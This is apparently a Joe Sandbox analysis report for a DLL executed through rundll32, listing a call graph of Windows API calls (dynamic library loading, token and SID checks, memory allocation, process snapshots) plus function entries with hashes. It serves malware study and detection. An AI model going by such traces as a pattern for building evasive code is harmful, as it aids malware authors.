Concurrency::cancel_current_task 51 API calls 9096->9097 9097->9089 9097->9091 9097->9095 9097->9096 9282 1800d37a4 9098->9282 9121 1800dbbc8 9107->9121 9222 1800ed87c 9112->9222 9116 1800d3772 Concurrency::cancel_current_task 9115->9116 9117 1800d7ba8 Concurrency::cancel_current_task 2 API calls 9116->9117 9118 1800d3783 Concurrency::cancel_current_task 9117->9118 9119 1800d7ba8 Concurrency::cancel_current_task 2 API calls 9118->9119 9120 1800d37a3 9119->9120 9122 1800dbbf3 9121->9122 9133 1800dbc64 9122->9133 9124 1800dbc1a 9125 1800dbc3d 9124->9125 9143 1800db944 9124->9143 9126 1800dbc52 9125->9126 9128 1800db944 _invalid_parameter_noinfo_noreturn 49 API calls 9125->9128 9129 1800dbd80 IsProcessorFeaturePresent 9126->9129 9128->9126 9130 1800dbd93 9129->9130 9131 1800dba64 _invalid_parameter_noinfo_noreturn 11 API calls 9130->9131 9132 1800dbdae GetCurrentProcess TerminateProcess 9131->9132 9152 1800db9ac 9133->9152 9136 1800dbc9f 9136->9124 9139 1800dbd80 _invalid_parameter_noinfo_noreturn 14 API calls 9140 1800dbd2f 9139->9140 9141 1800dbbc8 _invalid_parameter_noinfo_noreturn 49 API calls 9140->9141 9142 1800dbd49 9141->9142 9142->9124 9144 1800db997 9143->9144 9145 1800db957 GetLastError 9143->9145 9144->9125 9146 1800db967 9145->9146 9147 1800efd34 _invalid_parameter_noinfo_noreturn 16 API calls 9146->9147 9148 1800db982 SetLastError 9147->9148 9148->9144 9149 1800db9a5 9148->9149 9178 1800db8d0 9149->9178 9153 1800db9c8 GetLastError 9152->9153 9154 1800dba03 9152->9154 9155 1800db9d8 9153->9155 9154->9136 9158 1800dba18 9154->9158 9161 1800efd34 9155->9161 9159 1800dba4c 9158->9159 9160 1800dba34 GetLastError SetLastError 9158->9160 9159->9136 9159->9139 9160->9159 9162 1800efd6e FlsSetValue 9161->9162 9163 1800efd53 FlsGetValue 9161->9163 9164 1800efd7b 9162->9164 9167 1800db9f3 SetLastError 9162->9167 9165 1800efd68 9163->9165 9163->9167 9166 1800eed50 _Getctype 11 API calls 9164->9166 9165->9162 9168 1800efd8a 9166->9168 9167->9154 9169 1800efda8 FlsSetValue 9168->9169 9170 1800efd98 FlsSetValue 9168->9170 9172 1800efdc6 9169->9172 9173 1800efdb4 FlsSetValue 9169->9173 9171 1800efda1 9170->9171 9174 1800eedc8 __free_lconv_num 11 API calls 9171->9174 9175 1800ef85c _Getctype 11 API calls 9172->9175 9173->9171 9174->9167 9176 1800efdce 9175->9176 9177 1800eedc8 __free_lconv_num 11 API calls 9176->9177 9177->9167 9187 1800f21f8 9178->9187 9181 1800db8e8 9183 1800db8f1 IsProcessorFeaturePresent 9181->9183 9185 1800db91b _invalid_parameter_noinfo_noreturn 9181->9185 9184 1800db900 9183->9184 9213 1800dba64 9184->9213 9188 1800f21b0 _invalid_parameter_noinfo_noreturn EnterCriticalSection LeaveCriticalSection 9187->9188 9189 1800db8d9 9188->9189 9189->9181 9190 1800f2248 9189->9190 9193 1800f2278 9190->9193 9194 1800f229f 9190->9194 9191 1800efc6c memcpy_s 11 API calls 9198 1800f228c 9191->9198 9192 1800f2374 9197 1800f24a8 9192->9197 9199 1800f23db 9192->9199 9206 1800f23a2 9192->9206 9193->9191 9193->9194 9193->9198 9194->9192 9196 1800ed508 std::_Locinfo::_Locinfo_ctor EnterCriticalSection 9194->9196 9195 1800f22dc 9195->9181 9196->9192 9200 1800f24b5 _invalid_parameter_noinfo_noreturn 9197->9200 9204 1800ed568 std::_Locinfo::_Locinfo_ctor LeaveCriticalSection 9197->9204 9198->9194 9198->9195 9201 1800f2321 9198->9201 9203 1800ed568 std::_Locinfo::_Locinfo_ctor LeaveCriticalSection 9199->9203 9211 1800f2439 9199->9211 9202 1800dbe9c memcpy_s 11 API calls 9201->9202 9205 1800f2326 9202->9205 9203->9211 9204->9200 9207 1800dbd30 _invalid_parameter_noinfo 49 API calls 9205->9207 9206->9199 9208 1800efaf4 _Getctype 49 API calls 9206->9208 9207->9195 9209 1800f23cb 9208->9209 9210 1800efaf4 _Getctype 49 API calls 9209->9210 9210->9199 9212 1800efaf4 49 API calls _Getctype 9211->9212 9212->9211 9214 1800dba9e _invalid_parameter_noinfo_noreturn 9213->9214 9215 1800dbae3 VirtualAllocExNuma 9214->9215 9216 1800dbb00 RtlVirtualUnwind 9215->9216 9217 1800dbb36 SetUnhandledExceptionFilter UnhandledExceptionFilter 9215->9217 9216->9217 9219 1800dbb88 _invalid_parameter_noinfo_noreturn 9217->9219 9220 1800d5000 _invalid_parameter_noinfo_noreturn 7 API calls 9219->9220 9221 1800dbba7 9220->9221 9221->9185 9227 1800ed508 EnterCriticalSection 9222->9227 9229 1800d74a6 __std_exception_copy 9228->9229 9230 1800d7471 9228->9230 9229->9094 9230->9229 9232 1800ec424 9230->9232 9233 1800ec43b 9232->9233 9234 1800ec431 9232->9234 9241 1800dbe9c 9233->9241 9234->9233 9239 1800ec456 9234->9239 9236 1800ec442 9244 1800dbd30 9236->9244 9237 1800ec44e 9237->9229 9239->9237 9240 1800dbe9c memcpy_s 11 API calls 9239->9240 9240->9236 9247 1800efc6c GetLastError 9241->9247 9243 1800dbea5 9243->9236 9245 1800dbbc8 _invalid_parameter_noinfo_noreturn 49 API calls 9244->9245 9246 1800dbd49 9245->9246 9246->9237 9248 1800efcad FlsSetValue 9247->9248 9252 1800efc90 9247->9252 9249 1800efcbf 9248->9249 9261 1800efc9d 9248->9261 9264 1800eed50 9249->9264 9250 1800efd19 SetLastError 9250->9243 9252->9248 9252->9261 9254 1800efcec FlsSetValue 9257 1800efd0a 9254->9257 9258 1800efcf8 FlsSetValue 9254->9258 9255 1800efcdc FlsSetValue 9256 1800efce5 9255->9256 9271 1800eedc8 9256->9271 9277 1800ef85c 9257->9277 9258->9256 9261->9250 9263 1800eedc8 __free_lconv_num 5 API calls 9263->9250 9269 1800eed61 _Getctype 9264->9269 9265 1800eedb2 9267 1800dbe9c memcpy_s 10 API calls 9265->9267 9266 1800eed96 HeapAlloc 9268 1800eedb0 9266->9268 9266->9269 9267->9268 9268->9254 9268->9255 9269->9265 9269->9266 9270 1800ed83c std::_Facet_Register EnterCriticalSection LeaveCriticalSection 9269->9270 9270->9269 9272 1800eedcd HeapFree 9271->9272 9273 1800eedfc 9271->9273 9272->9273 9274 1800eede8 GetLastError 9272->9274 9273->9261 9275 1800eedf5 __free_lconv_num 9274->9275 9276 1800dbe9c memcpy_s 9 API calls 9275->9276 9276->9273 9278 1800ef734 _Getctype EnterCriticalSection LeaveCriticalSection 9277->9278 9279 1800ef90e 9278->9279 9280 1800ef7b4 _Getctype 11 API calls 9279->9280 9281 1800ef923 9280->9281 9281->9263 9287 1800d3600 9282->9287 9285 1800d7ba8 Concurrency::cancel_current_task 2 API calls 9286 1800d37c6 9285->9286 9288 1800d7450 __std_exception_copy 49 API calls 9287->9288 9289 1800d3634 9288->9289 9289->9285 9293 1800e7f14 9290->9293 9298 1800efaf4 GetLastError 9293->9298 9295 1800e7f1d 9296 1800db8d0 _invalid_parameter_noinfo_noreturn 49 API calls 9295->9296 9297 1800e7f3d 9296->9297 9299 1800efb18 FlsGetValue 9298->9299 9300 1800efb35 FlsSetValue 9298->9300 9301 1800efb2f 9299->9301 9302 1800efb25 9299->9302 9300->9302 9303 1800efb47 9300->9303 9301->9300 9304 1800efba1 SetLastError 9302->9304 9305 1800eed50 _Getctype 11 API calls 9303->9305 9306 1800efbae 9304->9306 9307 1800efbc1 9304->9307 9308 1800efb56 9305->9308 9306->9295 9309 1800db8d0 _invalid_parameter_noinfo_noreturn 37 API calls 9307->9309 9310 1800efb74 FlsSetValue 9308->9310 9311 1800efb64 FlsSetValue 9308->9311 9312 1800efbc6 9309->9312 9314 1800efb80 FlsSetValue 9310->9314 9315 1800efb92 9310->9315 9313 1800efb6d 9311->9313 9316 1800efbd9 FlsGetValue 9312->9316 9317 1800efbf4 FlsSetValue 9312->9317 9318 1800eedc8 __free_lconv_num 11 API calls 9313->9318 9314->9313 9319 1800ef85c _Getctype 11 API calls 9315->9319 9321 1800efbee 9316->9321 9336 1800efbe6 9316->9336 9322 1800efc01 9317->9322 9317->9336 9318->9302 9320 1800efb9a 9319->9320 9323 1800eedc8 __free_lconv_num 11 API calls 9320->9323 9321->9317 9326 1800eed50 _Getctype 11 API calls 9322->9326 9323->9304 9324 1800efbec 9324->9295 9325 1800db8d0 _invalid_parameter_noinfo_noreturn 37 API calls 9327 1800efc69 9325->9327 9328 1800efc10 9326->9328 9329 1800efc2e FlsSetValue 9328->9329 9330 1800efc1e FlsSetValue 9328->9330 9332 1800efc4c 9329->9332 9333 1800efc3a FlsSetValue 9329->9333 9331 1800efc27 9330->9331 9334 1800eedc8 __free_lconv_num 11 API calls 9331->9334 9335 1800ef85c _Getctype 11 API calls 9332->9335 9333->9331 9334->9336 9337 1800efc54 9335->9337 9336->9324 9336->9325 9338 1800eedc8 __free_lconv_num 11 API calls 9337->9338 9338->9324 9340 18002066e 9339->9340 9341 180020e00 49 API calls 9340->9341 9342 180020688 9341->9342 9342->9020 9344 180020e24 9343->9344 9345 180020e66 9343->9345 9344->9345 9346 180020e00 49 API calls 9344->9346 9348 180013d40 9344->9348 9345->9022 9346->9344 9349 180013d53 9348->9349 9350 180013d7c 9348->9350 9349->9348 9349->9350 9351 1800dbd50 _invalid_parameter_noinfo_noreturn 49 API calls 9349->9351 9350->9344 9351->9349 9359 18003bbb0 9352->9359 9354 18003e5b3 9355 180013d40 49 API calls 9354->9355 9356 18003e5d1 9355->9356 9366 18003d200 9356->9366 9358 18003e5ed 9360 18003bbc6 9359->9360 9361 18003bc89 9360->9361 9362 1800dbd50 _invalid_parameter_noinfo_noreturn 49 API calls 9360->9362 9361->9354 9363 18003bcb1 9362->9363 9371 18003b640 9363->9371 9365 18003bce2 9365->9354 9367 18003d273 9366->9367 9370 18003d222 9366->9370 9367->9358 9368 18003d200 49 API calls 9368->9370 9369 180013d40 49 API calls 9369->9370 9370->9367 9370->9368 9370->9369 9374 18003b330 9371->9374 9373 18003b68a 9373->9365 9375 18003b39b 9374->9375 9376 18003b34d 9374->9376 9375->9373 9376->9375 9377 1800dbd50 _invalid_parameter_noinfo_noreturn 49 API calls 9376->9377 9378 18003b3e7 9377->9378 9378->9373 8823 180001000 8825 1800d23e8 8823->8825 8824 1800d24fd 8825->8824 8827 1800d2c10 LoadLibraryW 8825->8827 8828 1800d2c44 LoadLibraryW 8827->8828 8834 1800d2c53 8827->8834 8828->8834 8829 1800d2d38 8829->8825 8830 1800d2ca9 GetProcAddress 8830->8834 8831 1800d2ccb GetProcAddress 8831->8834 8832 1800d2ce9 GetProcAddress 8832->8834 8833 1800d2d0b GetProcAddress 8833->8834 8834->8829 8834->8830 8834->8831 8834->8832 8834->8833 8834->8834 9379 1800014c0 GetModuleHandleW 9443 180001180 9446 18005a270 9443->9446 9447 180011160 51 API calls 9446->9447 9448 18005a32f 9447->9448 9449 180011160 51 API calls 9448->9449 9450 18005a38f 9449->9450 9451 180011160 51 API calls 9450->9451 9452 18005a3e3 9451->9452 9453 180011160 51 API calls 9452->9453 9454 18005a48d 9453->9454 9455 180011160 51 API calls 9454->9455 9456 18005a4ed 9455->9456 9457 180011160 51 API calls 9456->9457 9458 18005a563 9457->9458 9459 180011160 51 API calls 9458->9459 9460 18005a5c1 9459->9460 9461 180011160 51 API calls 9460->9461 9462 18005a67f 9461->9462 9463 180011160 51 API calls 9462->9463 9464 18005a6f3 9463->9464 9465 180011160 51 API calls 9464->9465 9466 18005a75c 9465->9466 9471 18005ca80 9466->9471 9468 18005a7c4 9469 1800d5000 _invalid_parameter_noinfo_noreturn 7 API calls 9468->9469 9470 180001189 9469->9470 9472 18005cae2 9471->9472 9478 18005cbf8 9471->9478 9473 18005caf5 9472->9473 9474 18005cc2e 9472->9474 9476 180011160 51 API calls 9473->9476 9483 18000e1e0 9474->9483 9482 18005cb0c 9476->9482 9477 18005cc33 9479 18000e1e0 51 API calls 9477->9479 9478->9468 9480 18005cc39 9479->9480 9480->9468 9481 180011160 51 API calls 9481->9482 9482->9477 9482->9478 9482->9481 9484 1800d37a4 51 API calls 9483->9484 9485 18000e1f0 9484->9485 9486 1800dbd50 _invalid_parameter_noinfo_noreturn 49 API calls 9485->9486 9488 18000e22d 9485->9488 9487 18000e241 9486->9487 9487->9488 9489 1800dbd50 _invalid_parameter_noinfo_noreturn 49 API calls 9487->9489 9493 18000e291 9489->9493 9490 18000e3ff 9491 1800d5000 _invalid_parameter_noinfo_noreturn 7 API calls 9490->9491 9492 18000e503 9491->9492 9492->9477 9493->9490 9495 18000ec30 9493->9495 9497 18000ecbd 9495->9497 9501 18000ede8 9495->9501 9496 18000ba20 7 API calls 9503 18000ee70 9496->9503 9497->9497 9497->9501 9507 18000ba20 9497->9507 9499 1800d5000 _invalid_parameter_noinfo_noreturn 7 API calls 9500 18000f82c 9499->9500 9500->9490 9501->9496 9501->9503 9502 18000ba20 7 API calls 9506 18000ee74 9502->9506 9503->9503 9504 18000ba20 7 API calls 9503->9504 9505 18000efdc 9503->9505 9503->9506 9504->9505 9505->9502 9506->9499 9509 18000ba6d 9507->9509 9512 18000bb11 9507->9512 9508 1800d5000 _invalid_parameter_noinfo_noreturn 7 API calls 9510 18000bb4f 9508->9510 9509->9512 9513 18000b740 9509->9513 9510->9501 9512->9508 9516 18000b768 9513->9516 9514 1800d5000 _invalid_parameter_noinfo_noreturn 7 API calls 9515 18000ba09 9514->9515 9515->9509 9516->9514 8788 18001d410 8789 18001d4d0 8788->8789 8793 18001d43f 8788->8793 8791 18001d4e9 GetProcessHeap 8789->8791 8789->8793 8790 18001d449 8792 1800d56a4 3 API calls 8791->8792 8792->8793 8793->8790 8796 1800d56a4 8793->8796 8795 18001d4ba 8799 1800d5668 8796->8799 8798 1800d56ad 8798->8795 8800 1800d5682 8799->8800 8801 1800d567b 8799->8801 8803 1800ee950 8800->8803 8801->8798 8806 1800ee58c 8803->8806 8813 1800ed508 EnterCriticalSection 8806->8813 8808 1800ee5a8 8809 1800ee604 VirtualAllocExNuma 8808->8809 8810 1800ee5b1 8809->8810 8811 1800ed568 std::_Locinfo::_Locinfo_ctor LeaveCriticalSection 8810->8811 8812 1800ee5ba 8811->8812 8812->8801 9380 18001d2d0 9381 18001d2e0 9380->9381 9382 1800d7ba8 Concurrency::cancel_current_task 2 API calls 9381->9382 9383 18001d2f1 9382->9383 8835 180001410 SetLastError 8836 180001010 8837 1800db884 8836->8837 8841 1800f0754 8837->8841 8862 1800eff24 8841->8862 8844 1800eff24 _Getctype 5 API calls 8845 1800f0793 8844->8845 8846 1800eff24 _Getctype 5 API calls 8845->8846 8847 1800f07b2 8846->8847 8848 1800eff24 _Getctype 5 API calls 8847->8848 8849 1800f07d1 8848->8849 8850 1800eff24 _Getctype 5 API calls 8849->8850 8851 1800f07f0 8850->8851 8852 1800eff24 _Getctype 5 API calls 8851->8852 8853 1800f080f 8852->8853 8854 1800eff24 _Getctype 5 API calls 8853->8854 8855 1800f082e 8854->8855 8856 1800eff24 _Getctype 5 API calls 8855->8856 8857 1800f084d 8856->8857 8858 1800eff24 _Getctype 5 API calls 8857->8858 8859 1800f086c 8858->8859 8860 1800eff24 _Getctype 5 API calls 8859->8860 8861 1800f088b 8860->8861 8863 1800eff81 8862->8863 8869 1800eff7c _Getctype 8862->8869 8863->8844 8864 1800effb1 LoadLibraryExW 8866 1800f0086 8864->8866 8867 1800effd6 GetLastError 8864->8867 8865 1800f00a6 GetProcAddress 8865->8863 8866->8865 8868 1800f009d FreeLibrary 8866->8868 8867->8869 8868->8865 8869->8863 8869->8864 8869->8865 8870 1800f0010 LoadLibraryExW 8869->8870 8870->8866 8870->8869 9384 180001ad0 9385 1800dc220 9384->9385 9386 1800f25bb 9385->9386 9387 1800f25b1 9385->9387 9389 1800f25c0 9386->9389 9395 1800f25c7 _Getctype 9386->9395 9397 1800eee04 9387->9397 9392 1800eedc8 __free_lconv_num 11 API calls 9389->9392 9390 1800f25cd 9393 1800dbe9c memcpy_s 11 API calls 9390->9393 9391 1800f25fa HeapReAlloc 9394 1800f25b9 9391->9394 9391->9395 9392->9394 9393->9394 9395->9390 9395->9391 9396 1800ed83c std::_Facet_Register 2 API calls 9395->9396 9396->9395 9398 1800eee4f 9397->9398 9403 1800eee13 _Getctype 9397->9403 9399 1800dbe9c memcpy_s 11 API calls 9398->9399 9401 1800eee4d 9399->9401 9400 1800eee36 HeapAlloc 9400->9401 9400->9403 9401->9394 9402 1800ed83c std::_Facet_Register 2 API calls 9402->9403 9403->9398 9403->9400 9403->9402 9409 180001510 GetCurrentThread OpenThreadToken 9410 180001582 GetTokenInformation 9409->9410 9411 180001552 GetLastError 9409->9411 9414 1800015c8 GetLastError 9410->9414 9423 180001692 9410->9423 9412 18000157b __std_exception_copy 9411->9412 9413 18000155f GetCurrentProcess OpenProcessToken 9411->9413 9416 1800d5000 _invalid_parameter_noinfo_noreturn 7 API calls 9412->9416 9413->9410 9413->9412 9415 1800015de 9414->9415 9418 180001617 9415->9418 9419 1800015f0 GetTokenInformation 9415->9419 9417 18000170d 9416->9417 9420 180001630 AllocateAndInitializeSid 9418->9420 9418->9423 9419->9418 9419->9423 9420->9423 9424 18000166d 9420->9424 9421 1800016d1 FreeSid 9421->9412 9422 180001676 EqualSid 9422->9423 9422->9424 9423->9412 9423->9421 9424->9422 9424->9423 9517 1800011d0 9518 1800d505c std::_Facet_Register 51 API calls 9517->9518 9519 1800011e1 9518->9519 8871 18001f820 8872 18001f860 8871->8872 8873 18001f84e 8871->8873 8875 18001f881 LoadLibraryExW 8872->8875 8876 18001f86f 8872->8876 8873->8872 8882 18001f790 8873->8882 8877 18001f8a0 8875->8877 8878 18001f8d7 8877->8878 8879 18001f8b6 GetLastError 8877->8879 8880 18001f8be 8877->8880 8879->8880 8880->8878 8881 18001f8cf SetLastError 8880->8881 8881->8878 8883 18001f7a3 OutputDebugStringA 8882->8883 8884 18001f7b6 8882->8884 8883->8884 8885 18001f7c8 8884->8885 8888 18001f7ee 8884->8888 8889 18001f5c0 8884->8889 8887 18001f7e0 GetLastError 8885->8887 8885->8888 8887->8888 8888->8872 8890 18001f5ee 8889->8890 8899 18001f75d 8889->8899 8891 18001f5fc QueryActCtxW 8890->8891 8890->8899 8894 18001f637 8891->8894 8891->8899 8895 18001f664 GetModuleFileNameW 8894->8895 8894->8899 8902 18001f6f9 8894->8902 8896 18001f685 8895->8896 8895->8899 8897 18001f69c 8896->8897 8898 18001f68c SetLastError 8896->8898 8901 18001f6e8 GetLastError 8897->8901 8897->8902 8898->8899 8903 1800d5000 8899->8903 8900 18001f74f LoadLibraryW 8900->8899 8901->8902 8902->8899 8902->8900 8904 1800d5009 8903->8904 8905 18001f781 8904->8905 8906 1800d50e0 IsProcessorFeaturePresent 8904->8906 8905->8885 8907 1800d50f8 8906->8907 8912 1800d52d8 8907->8912 8913 1800d52e9 8912->8913 8914 1800d52f2 VirtualAllocExNuma 8913->8914 8915 1800d5308 RtlVirtualUnwind 8914->8915 8916 1800d510b 8914->8916 8915->8914 8915->8916 8917 1800d50a0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8916->8917 8920 1800014a0 GetTickCount 9404 1800012e0 InitializeCriticalSection 9428 180006920 9429 180006933 9428->9429 9430 180006929 9428->9430 9431 1800069ab 9429->9431 9435 180003c80 9429->9435 9432 180003c80 11 API calls 9431->9432 9434 1800069e8 9431->9434 9432->9434 9438 180003bb0 9435->9438 9439 180100220 9438->9439 9440 180003bec VerSetConditionMask VerSetConditionMask VerSetConditionMask VerifyVersionInfoW 9439->9440 9441 1800d5000 _invalid_parameter_noinfo_noreturn 7 API calls 9440->9441 9442 180003c6f 9441->9442 9442->9431

                                                                                                                                            Executed Functions

                                                                                                                                            Function 00007DF4DD100100 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 214COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000003.2257756805.00007DF4DD100000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF4DD100000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_3_7df4dd100000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateSnapshotToolhelp32
                                                                                                                                            • String ID: @
                                                                                                                                            • API String ID: 3332741929-2766056989
                                                                                                                                            • Opcode ID: 4dd753c87e2aa29c9c96ae48a87dd40f0169a1ec6aa8ae238ef9ae283b3ca07b
                                                                                                                                            • Instruction ID: c9ec7b5872f907cd43594026c22f1e08b0b7b9715ec2f75486b6cc4481903521
                                                                                                                                            • Opcode Fuzzy Hash: 4dd753c87e2aa29c9c96ae48a87dd40f0169a1ec6aa8ae238ef9ae283b3ca07b
                                                                                                                                            • Instruction Fuzzy Hash: 6071CD3161494D8FEB94EF58C858BAD37E5FB98315F104226E81EC72A0DB749954CB80
                                                                                                                                            Function 00000293134ED279 Relevance: .0, Instructions: 43COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000003.2168774337.00000293134B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000293134B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_3_293134b0000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: d7e753f29fc521fa2d0b6c7a6994e588844e22f1070003091da851a212630d82
                                                                                                                                            • Instruction ID: e603c2adcafda4036e2caf7c6055458bf92d1742c850cdf020dab42ebc9b2872
                                                                                                                                            • Opcode Fuzzy Hash: d7e753f29fc521fa2d0b6c7a6994e588844e22f1070003091da851a212630d82
                                                                                                                                            • Instruction Fuzzy Hash: 64F0A470618B408BEB44DF1884CA63677E1FBD8755F24452EE889C7371CB359842CB83
                                                                                                                                            Function 00000293134ED2E9 Relevance: .0, Instructions: 37COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000003.2168774337.00000293134B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000293134B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_3_293134b0000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c03d8a45eb9b0d3ccc835ff03553e770b46152858ebd01b16508ffef1a6f20c3
                                                                                                                                            • Instruction ID: 7ead1ce74da6b064b80a89ebe7293795d446223bf9d178df3ae45fb7facb266e
                                                                                                                                            • Opcode Fuzzy Hash: c03d8a45eb9b0d3ccc835ff03553e770b46152858ebd01b16508ffef1a6f20c3
                                                                                                                                            • Instruction Fuzzy Hash: A9F05470A28F444BDB48EF2C884A63577D1F7A8645F54453EA448C7361DF35E5428B43
                                                                                                                                            Function 00000001800EE604 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 52memoryCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocNumaVirtual
                                                                                                                                            • String ID: ,=$0m8B$2cc)$@$m)S9$pZ5u
                                                                                                                                            • API String ID: 4233825816-2795462132
                                                                                                                                            • Opcode ID: ea224779a45d07559d73cbc71cfa124f413c696b979030cadcaad53e6331c73d
                                                                                                                                            • Instruction ID: 26dc1e36989902e02d5f08e91251171354dcc459b97bff11772d218079fe3606
                                                                                                                                            • Opcode Fuzzy Hash: ea224779a45d07559d73cbc71cfa124f413c696b979030cadcaad53e6331c73d
                                                                                                                                            • Instruction Fuzzy Hash: 231159727102885DE7618FB5E44479D3BA0F328BA8F54422A9A6D67BD4DA38C60ECB14
                                                                                                                                            Function 00007DF4DD100000 Relevance: 6.1, APIs: 4, Instructions: 88processCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000003.2257756805.00007DF4DD100000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF4DD100000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_3_7df4dd100000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1083639309-0
                                                                                                                                            • Opcode ID: 7b76749183c32904e7c867cae929a431087f8f66ce00ca14fd6eade76c102862
                                                                                                                                            • Instruction ID: bc8234dab0e77f46646fe052733c1672029c0de449a4d848e29ee2c6f10be317
                                                                                                                                            • Opcode Fuzzy Hash: 7b76749183c32904e7c867cae929a431087f8f66ce00ca14fd6eade76c102862
                                                                                                                                            • Instruction Fuzzy Hash: DE21B83065495D8FEBA1EB9CCC58BEE33F5EBA8310F404226941EDB294DE35AA448750
                                                                                                                                            Function 00000293134EBE69 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 317COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000003.2168774337.00000293134B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000293134B0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_3_293134b0000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 0-3916222277
                                                                                                                                            • Opcode ID: e1b5f217ab961a454b36722efd1ce63e8d0791c74eab14a614d4f9e3fc2a9a33
                                                                                                                                            • Instruction ID: 000be774d9cfe32d78eb128b8dda6673e26440be64146405b8c73bca796068e9
                                                                                                                                            • Opcode Fuzzy Hash: e1b5f217ab961a454b36722efd1ce63e8d0791c74eab14a614d4f9e3fc2a9a33
                                                                                                                                            • Instruction Fuzzy Hash: 27B1713121CA088FDF54EF1CD889B9AB7E1FB98310F404669E48DC7265DB34E945CB86

                                                                                                                                            Non-executed Functions

                                                                                                                                            Function 0000000180001510 Relevance: 16.6, APIs: 11, Instructions: 130threadmemoryCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Token$CurrentErrorInformationLastOpenProcessThread$AllocateEqualFreeInitialize
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 64348521-0
                                                                                                                                            • Opcode ID: 60c7760728c6a4a746a0896dd83b165dd113752e42dee95d8ef29115c47e0203
                                                                                                                                            • Instruction ID: 834d127787b2faee8a44574038080d036508957a38a80e6c70e57281afcce267
                                                                                                                                            • Opcode Fuzzy Hash: 60c7760728c6a4a746a0896dd83b165dd113752e42dee95d8ef29115c47e0203
                                                                                                                                            • Instruction Fuzzy Hash: F2518072604A44CAEBA2CF21E8943DE37A4FB4CBC9F049119FA4A43B54DF39C649C710
                                                                                                                                            Function 00000001800FA160 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 239COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
